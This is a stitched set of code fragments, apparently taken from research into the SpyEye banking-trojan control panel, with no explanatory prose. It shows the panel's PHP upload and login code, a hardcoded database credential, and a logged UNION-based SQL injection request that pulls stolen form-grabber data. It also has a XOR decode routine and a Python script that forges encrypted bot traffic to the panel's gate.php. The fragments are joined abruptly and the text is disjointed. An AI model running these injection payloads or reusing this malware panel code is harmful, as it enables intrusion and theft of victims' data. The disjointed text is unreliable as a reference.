if ($_FILES['file']['tmp_name'] && ($_FILES['file']['size'] > 0)) { $outstr = "<br>"; set_time_limit(0); $filename = str_replace(" ","_",$_FILES['file']['name']); $ext = substr($filename, strrpos($filename, '.')+1); if( $ext==='bin' && $uptype!=='config' ) $outstr .= "<font class='error'>Bad CONFIG extension!</font><br>"; if( $ext==='exe' && $uptype!=='body' && $uptype!=='exe' ) $outstr .= "<font class='error'>Bad extension!</font><br>"; switch( $uptype ) { case 'body': $ext = 'b'; break; case 'config': $ext = 'c'; break; case 'exe': $ext = 'e'; break; default: $ext = 'e'; } $_SESSION['file_ext'] = $ext; if( isset($_POST['bots']) && trim($_POST['bots']) !== '') { $bots = explode(' ', trim($_POST['bots'])); //writelog("debug.log", trim($_POST['bots'])); $filename .= "_".(LastFileId()+1); } if( FileExist($filename) ) $filename .= LastFileId(); $tmpName = $_FILES['file']['tmp_name']; $fileSize = $_FILES['file']['size']; $fileType = $_FILES['file']['type']; ## reading all file for calculating hash $fp = fopen($tmpName, 'r');
$query = "SELECT * FROM users_t WHERE uPswd='".md5($pswd)."'";
CREATE USER 'frmcpviewer' IDENTIFIED BY 'SgFGSADGFJSDGKFy2763272qffffHDSJ';
Access denied for user 'frmcpviewer' (using password: YES)
63.217.168.90 - - [16/Jun/2014:04:43:00 -0500] "GET /form/frm_boa-grabber_sub.php?bot_guid=&lm=3&dt=%20where%201=2%20union%20select%20@a:=1%20from%20rep1%20where%20@a%20is%20null%20union%20select%20@a:=%20@a%20%2b1%20union%20select%20concat(id,char(1,3,3,7),bot_guid,char(1,3,3,7),process_name,char(1,3,3,7),hooked_func,char(1,3,3,7),url,char(1,3,3,7),func_data)%20from%20rep2_20140610%20where%20@a=3%23 HTTP/1.1" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)"
$content = fread($fp, filesize($tmpName)); if ( $uptype === 'config' ) $md5 = GetCRC32($content); else $md5 = md5($content); .... <script> if (navigator.userAgent.indexOf("Mozilla/4.0") != -1) { alert("Your browser is not support yet. Please, use another (FireFox, Opera, Safari)"); document.getElementById("div_main").innerHTML = "<font class=\'error\'>ChAnGE YOuR BRoWsEr! Dont use BUGGED Microsoft products!</font>"; } </script>
function DeCode($content) { $res = ''; for($i = 0; $i < strlen($content); $i++) { $num = ord($content[$i]); if( $num != 219) $res .= chr($num^219); } return $res; }
import binascii import requests import httplib, urllib def xor_str(a, b): i = 0 xorred = '' for i in range(len(a)): xorred += chr(ord(a[i])^b) return xorred b64_data= "vK6yv+bt9er17O3r6vqPnoiPjZb2i5j6muvo6+rjmJ/9rb6p5urr6O/j/bK+5uP16/Xs7evq9ers7urv/bSo5u316vXs7evq/a6v5pq/trK1/bi4qbjm453j6uPv7Or9tr/u5um+uuvpve3p7eq/4+vsveLi7Lnqvrjr6ujs7rjt7rns/au3vOa5sre3srW8s7q2tr6p4Lm3tLiw4LmuvKm+q7Spr+C4uPu8qbq5ub6p4Li4vKm6ubm+qeC4qb6/sq+8qbq54LiuqK+0tri0tbW+uK+0qeC/v7So4L+1qLqrsuC+trqyt7ypurm5vqngvb24vqmvvKm6ubm+qeC9/aivuq/mtLW3srW+" payload =xor_str (binascii.a2b_base64(b64_data), 219) print ("the decrypted payload is: " + payload) params = (binascii.b2a_base64(xor_str(payload,219))) payload = {'data': params} r = requests.post("http://spyeye.localhost/spyeye/_cg/gate.php", data=payload)
Click to Open Code Editor